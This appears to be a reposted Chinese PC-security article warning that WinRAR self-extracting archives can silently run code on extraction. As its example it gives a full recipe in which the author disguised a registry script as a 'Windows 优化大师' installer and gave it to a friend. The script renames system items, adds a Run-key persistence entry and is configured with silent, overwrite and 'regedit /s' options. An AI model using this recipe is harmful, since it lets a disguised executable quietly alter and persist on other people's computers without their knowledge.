安全威胁:WinRAR自解压程序可执行任意代码

导读:作为现在最为知名的压缩程序,WIN RAR可谓风光无限,但你知道吗,我们在方便的使用它的同时,也面临着来自它的安全威胁,那就是,它附带的一个强大的功能可以创建自解压程序,而且一般的个人电脑用户在面对这种程序的时候,基本上没有戒备的心理,会毫不犹豫的点击并执行它,如果这其中包含着木马程序,那后果就严重了.

与Winzip相比，Winrar3.0的自解压程序要多出功能。其中一项最为突出的功能，也是潜在着最大安全威胁的是：它可以在解压前或解压后，无声无息地自动执行任意代码,至于什么代码,你就可以想象了。
　　
　　　　如果你不以为然，先看完以下事例：
　　
　　　　几天前，一位朋友要我copy一份我从网上下载的‘Windows 优化大师’给他，我灵机一动，想起这几天研究Winrar3.0的心得，便满口答应。到了晚上，我花了几小时的时间为他特制了一份‘Windows 优化大师’，制作流程如下：建立一个注册表脚本文件，我取的文件名为regeditt.reg在里面写入：REGEDIT4[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion]"Registered
　　Owner"="××"[HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}]@="××""InfoTip"="包含可以恢复或永久删除的已删除项目。"[HKEY_USERS\.DEFAULT\Software\Classes\CLSID\{20D04FE0-
　　3AEA-1069-A2D8-08002B30309D}]@="××的电脑" [HKEY_CURRENT_USER
　　\Control Panel\International]"StimeFormat"="×× HH:mm"[HKEY_LOCAL_MACHINE\
　　SoftwareMicrosoft\Windows\CurrentVersion\Run]"TaskMonitoy"="regedit /s c:\\Windows\\sysbckup
　　\\regeditt.reg"注：以上××均是不健康的调侃他人的词汇，编辑对它们做了净化。
　　
　　　　上面第一项是更改计算机注册名称，第二项是更改‘回收站’名称，第三项是更改‘我的电脑’名称。第四项是在任务栏时间前加上文字,第五项是每次开机后自动运行c:\Windows\sysbckup\regeditt.reg。
　　
　　　　建立完成后就是用Winrar打包了，选中regeditt.reg后击右键，在菜单中选‘添加到档案文件’，在弹出对话框中，把档案名称写为a1.exe，在下面存档选项中选中‘创建自释放格式’。然后在高级-自释放选项中写入释放路径，我写的是c:\Windows\Sysbckup，接下来就是在‘释放后运行’中写入regeditt.reg，然后在模式中选中‘全部隐藏’和‘覆盖所有文件’，完成这些后按确定，再选择注释我们会看到以下内容：Path=c:\Windows\SysbckupSetup=regeditt.regSilent=1Overwrite=1我们发现释放后运行的格式是Setup=*.*,这里是=regeditt.reg，但这样运行后系统会提示你是否确认导入注册表，所以应作如下修改：Path=c:\Windows\SysbckupSetup=regedit /s regeditt.regSilent=1Overwrite=1完成后按确定按扭，就会建立出一个名为a1.exe的Winrar自解压程序,如果双击运行它，屏幕上将没有任何显示，但它已无声无息地把regeditt.reg拷贝到c:\Windows\Sysbckup，并把其中的内容写入到注册表中了。

转截请注明:文章来自 pc捍卫者 http://www.pchwz.com 本站发布此文为传递更多信息之目的,不表明pc捍卫者赞同其观点